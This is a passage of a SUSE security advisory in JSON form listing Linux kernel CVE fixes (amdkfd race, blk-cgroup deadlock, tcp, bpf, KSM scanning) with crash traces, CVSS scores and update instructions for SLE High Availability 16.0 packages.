"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 2.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "low"
}
],
"title": "CVE-2025-40363"
},
{
"cve": "CVE-2025-68174",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68174"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\namd/amdkfd: enhance kfd process check in switch partition\n\ncurrent switch partition only check if kfd_processes_table is empty.\nkfd_prcesses_table entry is deleted in kfd_process_notifier_release, but\nkfd_process tear down is in kfd_process_wq_release.\n\nconsider two processes:\n\nProcess A (workqueue) -\u003e kfd_process_wq_release -\u003e Access kfd_node member\nProcess B switch partition -\u003e amdgpu_xcp_pre_partition_switch -\u003e amdgpu_amdkfd_device_fini_sw\n-\u003e kfd_node tear down.\n\nProcess A and B may trigger a race as shown in dmesg log.\n\nThis patch is to resolve the race by adding an atomic kfd_process counter\nkfd_processes_count, it increment as create kfd process, decrement as\nfinish kfd_process_wq_release.\n\nv2: Put kfd_processes_count per kfd_dev, move decrement to kfd_process_destroy_pdds\nand bug fix. (Philip Yang)\n\n[3966658.307702] divide error: 0000 [#1] SMP NOPTI\n[3966658.350818] i10nm_edac\n[3966658.356318] CPU: 124 PID: 38435 Comm: kworker/124:0 Kdump: loaded Tainted\n[3966658.356890] Workqueue: kfd_process_wq kfd_process_wq_release [amdgpu]\n[3966658.362839] nfit\n[3966658.366457] RIP: 0010:kfd_get_num_sdma_engines+0x17/0x40 [amdgpu]\n[3966658.366460] Code: 00 00 e9 ac 81 02 00 66 66 2e 0f 1f 84 00 00 00 00 00 90 0f 1f 44 00 00 48 8b 4f 08 48 8b b7 00 01 00 00 8b 81 58 26 03 00 99 \u003cf7\u003e be b8 01 00 00 80 b9 70 2e 00 00 00 74 0b 83 f8 02 ba 02 00 00\n[3966658.380967] x86_pkg_temp_thermal\n[3966658.391529] RSP: 0018:ffffc900a0edfdd8 EFLAGS: 00010246\n[3966658.391531] RAX: 0000000000000008 RBX: ffff8974e593b800 RCX: ffff888645900000\n[3966658.391531] RDX: 0000000000000000 RSI: ffff888129154400 RDI: ffff888129151c00\n[3966658.391532] RBP: ffff8883ad79d400 R08: 0000000000000000 R09: ffff8890d2750af4\n[3966658.391532] R10: 0000000000000018 R11: 0000000000000018 R12: 0000000000000000\n[3966658.391533] R13: ffff8883ad79d400 R14: ffffe87ff662ba00 R15: ffff8974e593b800\n[3966658.391533] FS: 0000000000000000(0000) GS:ffff88fe7f600000(0000) knlGS:0000000000000000\n[3966658.391534] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[3966658.391534] CR2: 0000000000d71000 CR3: 000000dd0e970004 CR4: 0000000002770ee0\n[3966658.391535] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[3966658.391535] DR3: 0000000000000000 DR6: 00000000fffe07f0 DR7: 0000000000000400\n[3966658.391536] PKRU: 55555554\n[3966658.391536] Call Trace:\n[3966658.391674] deallocate_sdma_queue+0x38/0xa0 [amdgpu]\n[3966658.391762] process_termination_cpsch+0x1ed/0x480 [amdgpu]\n[3966658.399754] intel_powerclamp\n[3966658.402831] kfd_process_dequeue_from_all_devices+0x5b/0xc0 [amdgpu]\n[3966658.402908] kfd_process_wq_release+0x1a/0x1a0 [amdgpu]\n[3966658.410516] coretemp\n[3966658.434016] process_one_work+0x1ad/0x380\n[3966658.434021] worker_thread+0x49/0x310\n[3966658.438963] kvm_intel\n[3966658.446041] ? process_one_work+0x380/0x380\n[3966658.446045] kthread+0x118/0x140\n[3966658.446047] ? __kthread_bind_mask+0x60/0x60\n[3966658.446050] ret_from_fork+0x1f/0x30\n[3966658.446053] Modules linked in: kpatch_20765354(OEK)\n[3966658.455310] kvm\n[3966658.464534] mptcp_diag xsk_diag raw_diag unix_diag af_packet_diag netlink_diag udp_diag act_pedit act_mirred act_vlan cls_flower kpatch_21951273(OEK) kpatch_18424469(OEK) kpatch_19749756(OEK)\n[3966658.473462] idxd_mdev\n[3966658.482306] kpatch_17971294(OEK) sch_ingress xt_conntrack amdgpu(OE) amdxcp(OE) amddrm_buddy(OE) amd_sched(OE) amdttm(OE) amdkcl(OE) intel_ifs iptable_mangle tcm_loop target_core_pscsi tcp_diag target_core_file inet_diag target_core_iblock target_core_user target_core_mod coldpgs kpatch_18383292(OEK) ip6table_nat ip6table_filter ip6_tables ip_set_hash_ipportip ip_set_hash_ipportnet ip_set_hash_ipport ip_set_bitmap_port xt_comment iptable_nat nf_nat iptable_filter ip_tables ip_set ip_vs_sh ip_vs_wrr ip_vs_rr ip_vs nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 sn_core_odd(OE) i40e overlay binfmt_misc tun bonding(OE) aisqos(OE) aisqo\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68174",
"url": "https://www.suse.com/security/cve/CVE-2025-68174"
},
{
"category": "external",
"summary": "SUSE Bug 1255327 for CVE-2025-68174",
"url": "https://bugzilla.suse.com/1255327"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68174"
},
{
"cve": "CVE-2025-68178",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68178"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nblk-cgroup: fix possible deadlock while configuring policy\n\nFollowing deadlock can be triggered easily by lockdep:\n\nWARNING: possible circular locking dependency detected\n6.17.0-rc3-00124-ga12c2658ced0 #1665 Not tainted\n------------------------------------------------------\ncheck/1334 is trying to acquire lock:\nff1100011d9d0678 (\u0026q-\u003esysfs_lock){+.+.}-{4:4}, at: blk_unregister_queue+0x53/0x180\n\nbut task is already holding lock:\nff1100011d9d00e0 (\u0026q-\u003eq_usage_counter(queue)#3){++++}-{0:0}, at: del_gendisk+0xba/0x110\n\nwhich lock already depends on the new lock.\n\nthe existing dependency chain (in reverse order) is:\n\n-\u003e #2 (\u0026q-\u003eq_usage_counter(queue)#3){++++}-{0:0}:\n blk_queue_enter+0x40b/0x470\n blkg_conf_prep+0x7b/0x3c0\n tg_set_limit+0x10a/0x3e0\n cgroup_file_write+0xc6/0x420\n kernfs_fop_write_iter+0x189/0x280\n vfs_write+0x256/0x490\n ksys_write+0x83/0x190\n __x64_sys_write+0x21/0x30\n x64_sys_call+0x4608/0x4630\n do_syscall_64+0xdb/0x6b0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n-\u003e #1 (\u0026q-\u003erq_qos_mutex){+.+.}-{4:4}:\n __mutex_lock+0xd8/0xf50\n mutex_lock_nested+0x2b/0x40\n wbt_init+0x17e/0x280\n wbt_enable_default+0xe9/0x140\n blk_register_queue+0x1da/0x2e0\n __add_disk+0x38c/0x5d0\n add_disk_fwnode+0x89/0x250\n device_add_disk+0x18/0x30\n virtblk_probe+0x13a3/0x1800\n virtio_dev_probe+0x389/0x610\n really_probe+0x136/0x620\n __driver_probe_device+0xb3/0x230\n driver_probe_device+0x2f/0xe0\n __driver_attach+0x158/0x250\n bus_for_each_dev+0xa9/0x130\n driver_attach+0x26/0x40\n bus_add_driver+0x178/0x3d0\n driver_register+0x7d/0x1c0\n __register_virtio_driver+0x2c/0x60\n virtio_blk_init+0x6f/0xe0\n do_one_initcall+0x94/0x540\n kernel_init_freeable+0x56a/0x7b0\n kernel_init+0x2b/0x270\n ret_from_fork+0x268/0x4c0\n ret_from_fork_asm+0x1a/0x30\n\n-\u003e #0 (\u0026q-\u003esysfs_lock){+.+.}-{4:4}:\n __lock_acquire+0x1835/0x2940\n lock_acquire+0xf9/0x450\n __mutex_lock+0xd8/0xf50\n mutex_lock_nested+0x2b/0x40\n blk_unregister_queue+0x53/0x180\n __del_gendisk+0x226/0x690\n del_gendisk+0xba/0x110\n sd_remove+0x49/0xb0 [sd_mod]\n device_remove+0x87/0xb0\n device_release_driver_internal+0x11e/0x230\n device_release_driver+0x1a/0x30\n bus_remove_device+0x14d/0x220\n device_del+0x1e1/0x5a0\n __scsi_remove_device+0x1ff/0x2f0\n scsi_remove_device+0x37/0x60\n sdev_store_delete+0x77/0x100\n dev_attr_store+0x1f/0x40\n sysfs_kf_write+0x65/0x90\n kernfs_fop_write_iter+0x189/0x280\n vfs_write+0x256/0x490\n ksys_write+0x83/0x190\n __x64_sys_write+0x21/0x30\n x64_sys_call+0x4608/0x4630\n do_syscall_64+0xdb/0x6b0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nother info that might help us debug this:\n\nChain exists of:\n \u0026q-\u003esysfs_lock --\u003e \u0026q-\u003erq_qos_mutex --\u003e \u0026q-\u003eq_usage_counter(queue)#3\n\n Possible unsafe locking scenario:\n\n CPU0 CPU1\n ---- ----\n lock(\u0026q-\u003eq_usage_counter(queue)#3);\n lock(\u0026q-\u003erq_qos_mutex);\n lock(\u0026q-\u003eq_usage_counter(queue)#3);\n lock(\u0026q-\u003esysfs_lock);\n\nRoot cause is that queue_usage_counter is grabbed with rq_qos_mutex\nheld in blkg_conf_prep(), while queue should be freezed before\nrq_qos_mutex from other context.\n\nThe blk_queue_enter() from blkg_conf_prep() is used to protect against\npolicy deactivation, which is already protected with blkcg_mutex, hence\nconvert blk_queue_enter() to blkcg_mutex to fix this problem. Meanwhile,\nconsider that blkcg_mutex is held after queue is freezed from policy\ndeactivation, also convert blkg_alloc() to use GFP_NOIO.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68178",
"url": "https://www.suse.com/security/cve/CVE-2025-68178"
},
{
"category": "external",
"summary": "SUSE Bug 1255266 for CVE-2025-68178",
"url": "https://bugzilla.suse.com/1255266"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68178"
},
{
"cve": "CVE-2025-68188",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68188"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntcp: use dst_dev_rcu() in tcp_fastopen_active_disable_ofo_check()\n\nUse RCU to avoid a pair of atomic operations and a potential\nUAF on dst_dev()-\u003eflags.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68188",
"url": "https://www.suse.com/security/cve/CVE-2025-68188"
},
{
"category": "external",
"summary": "SUSE Bug 1255269 for CVE-2025-68188",
"url": "https://bugzilla.suse.com/1255269"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68188"
},
{
"cve": "CVE-2025-68200",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68200"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Add bpf_prog_run_data_pointers()\n\nsyzbot found that cls_bpf_classify() is able to change\ntc_skb_cb(skb)-\u003edrop_reason triggering a warning in sk_skb_reason_drop().\n\nWARNING: CPU: 0 PID: 5965 at net/core/skbuff.c:1192 __sk_skb_reason_drop net/core/skbuff.c:1189 [inline]\nWARNING: CPU: 0 PID: 5965 at net/core/skbuff.c:1192 sk_skb_reason_drop+0x76/0x170 net/core/skbuff.c:1214\n\nstruct tc_skb_cb has been added in commit ec624fe740b4 (\"net/sched:\nExtend qdisc control block with tc control block\"), which added a wrong\ninteraction with db58ba459202 (\"bpf: wire in data and data_end for\ncls_act_bpf\").\n\ndrop_reason was added later.\n\nAdd bpf_prog_run_data_pointers() helper to save/restore the net_sched\nstorage colliding with BPF data_meta/data_end.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68200",
"url": "https://www.suse.com/security/cve/CVE-2025-68200"
},
{
"category": "external",
"summary": "SUSE Bug 1255241 for CVE-2025-68200",
"url": "https://bugzilla.suse.com/1255241"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68200"
},
{
"cve": "CVE-2025-68211",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68211"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nksm: use range-walk function to jump over holes in scan_get_next_rmap_item\n\nCurrently, scan_get_next_rmap_item() walks every page address in a VMA to\nlocate mergeable pages. This becomes highly inefficient when scanning\nlarge virtual memory areas that contain mostly unmapped regions, causing\nksmd to use large amount of cpu without deduplicating much pages.\n\nThis patch replaces the per-address lookup with a range walk using\nwalk_page_range(). The range walker allows KSM to skip over entire\nunmapped holes in a VMA, avoiding unnecessary lookups. This problem was\npreviously discussed in [1].\n\nConsider the following test program which creates a 32 TiB mapping in the\nvirtual address space but only populates a single page:\n\n#include \u003cunistd.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/mman.h\u003e\n\n/* 32 TiB */\nconst size_t size = 32ul * 1024 * 1024 * 1024 * 1024;\n\nint main() {\n char *area = mmap(NULL, size, PROT_READ | PROT_WRITE,\n MAP_NORESERVE | MAP_PRIVATE | MAP_ANON, -1, 0);\n\n if (area == MAP_FAILED) {\n perror(\"mmap() failed\\n\");\n return -1;\n }\n\n /* Populate a single page such that we get an anon_vma. */\n *area = 0;\n\n /* Enable KSM. */\n madvise(area, size, MADV_MERGEABLE);\n pause();\n return 0;\n}\n\n$ ./ksm-sparse \u0026\n$ echo 1 \u003e /sys/kernel/mm/ksm/run \n\nWithout this patch ksmd uses 100% of the cpu for a long time (more then 1\nhour in my test machine) scanning all the 32 TiB virtual address space\nthat contain only one mapped page. This makes ksmd essentially deadlocked\nnot able to deduplicate anything of value. With this patch ksmd walks\nonly the one mapped page and skips the rest of the 32 TiB virtual address\nspace, making the scan fast using 